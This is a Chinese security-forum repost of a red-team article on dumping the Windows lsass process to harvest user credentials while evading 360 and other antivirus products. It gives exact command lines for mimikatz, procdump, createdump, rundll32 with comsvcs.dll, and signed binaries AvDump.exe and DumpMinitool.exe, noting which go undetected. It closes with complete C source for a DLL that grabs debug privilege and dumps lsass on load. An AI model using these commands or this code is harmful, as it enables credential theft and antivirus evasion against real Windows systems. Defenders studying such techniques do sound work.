安全矩阵

 找回密码
 立即注册
搜索
查看: 2417|回复: 0

绕过360实现lsass转储

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-4-14 11:20:55 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2022-4-14 11:20 编辑

绕过360实现lsass转储

原创 ccYo1 红队蓝军 2022-04-14 11:00
原文链接:绕过360实现lsass转储


前言

获取Windows用户的凭证信息是渗透过程中至关重要的一步。
没杀软,只要有权限想怎么读就怎么读。
有杀软,得用一些特别的技巧。
注:本机所有测试均为物理机,且为最新版AV

Mimikatz直接读取Lsass进程

权限提升
  1. privilege::debug
复制代码

抓取密码
  1. sekurlsa::logonpasswords
复制代码


但如果此时目标机器上有AV,必定将收到拦截

此时mimikatz必须免杀。
一般来说,目标机器有杀软的存在,更倾向于离线解析密码。

白名单文件dump
首先说三个微软签名的白名单程序
  • Procdump.exe
  • SQLDumper.exe
  • createdump.exe

Procdump.exe(no)
尽管procdump拥有微软签名,但大部分AV厂商对此并不买账。
  1. procdump.exe  -ma lsass.exe 1.txt
复制代码



SQLDumper.exe也是一样的

createdump.exe(no)
createdump.exe随着.NET5出现的,本身是个native binary
虽然有签名同样遭到AV查杀


  1. createdump.exe -u -f lsass.dmp lsass[PID]
复制代码



Rundll32.exe(no)
使用rundll32直接执行comsvcs.dll的导出函数MiniDump来Dump进程内存
  1. rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id Desktop\lsass-comsvcs.dmp full
复制代码

同样被查杀


avdump.exe(yes)
AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。

默认路径为:
C:\Program Files\Avast Software\Avast

  1. AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp
复制代码

成功dump并解密,全程数字杀软无感。



DumpMinitool.exe(yes)
此exe为近日mr.d0x的某推上分享了的一个LOLBIN,通过vs2022里的DumpMinitool.exe来导出lsass进程。

路径为:
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

数字杀软全程无感
  1. DumpMinitool.exe --file 1.txt --processId 980 --dumpType Full
复制代码



其他方式

SilentProcessExit进行Dump(no)
具体原理参考文章:利用SilentProcessExit机制dump内存
Silent Process Exit,即静默退出。而这种调试技术,可以派生 werfault.exe进程,可以用来运行任意程序或者也可以用来转存任意进程的内存文件或弹出窗口。
但该方式需要修改注册表,修改注册表操作将会被查杀。

编写Dump Lsass的DLL(yes)
  • 获取Debug权限
  • 找到lsass的PID
  • 使用MiniDump或MiniDumpWriteDump进行内存dump
    1. #include <stdio.h>
    2. #include <Windows.h>
    3. #include <tlhelp32.h>

    4. typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);

    5. int GetLsassPid() {

    6. PROCESSENTRY32 entry;
    7. entry.dwSize = sizeof(PROCESSENTRY32);

    8. HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

    9. if (Process32First(hSnapshot, &entry)) {
    10.   while (Process32Next(hSnapshot, &entry)) {
    11.    if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
    12.     return entry.th32ProcessID;
    13.    }
    14.   }
    15. }

    16. CloseHandle(hSnapshot);
    17. return 0;
    18. }

    19. void GetDebugPrivilege()
    20. {
    21. BOOL fOk = FALSE;
    22. HANDLE hToken;
    23. if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    24. {
    25.   TOKEN_PRIVILEGES tp;
    26.   tp.PrivilegeCount = 1;
    27.   LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    28.   tp.Privileges[0].Attributes = true ? SE_PRIVILEGE_ENABLED : 0;
    29.   AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    30.   fOk = (GetLastError() == ERROR_SUCCESS);
    31.   CloseHandle(hToken);
    32. }
    33. }

    34. void DumpLsass()
    35. {
    36. wchar_t  ws[100];
    37. _MiniDumpW MiniDumpW;

    38. MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
    39. swprintf(ws, 100, L"%u %hs", GetLsassPid(), "c:\\windows\\temp\\temp.bin full");

    40. GetDebugPrivilege();

    41. MiniDumpW(0, 0, ws);
    42. }

    43. BOOL APIENTRY DllMain( HMODULE hModule,
    44.                        DWORD  ul_reason_for_call,
    45.                        LPVOID lpReserved
    46.                      )
    47. {
    48.     switch (ul_reason_for_call)
    49.     {
    50.     case DLL_PROCESS_ATTACH:
    51.   DumpLsass();
    52.   break;
    53.     case DLL_THREAD_ATTACH:
    54.     case DLL_THREAD_DETACH:
    55.     case DLL_PROCESS_DETACH:
    56.         break;
    57.     }
    58.     return TRUE;
    59. }
    复制代码


成功dump,数字杀软无感。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 12:47 , Processed in 0.013113 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表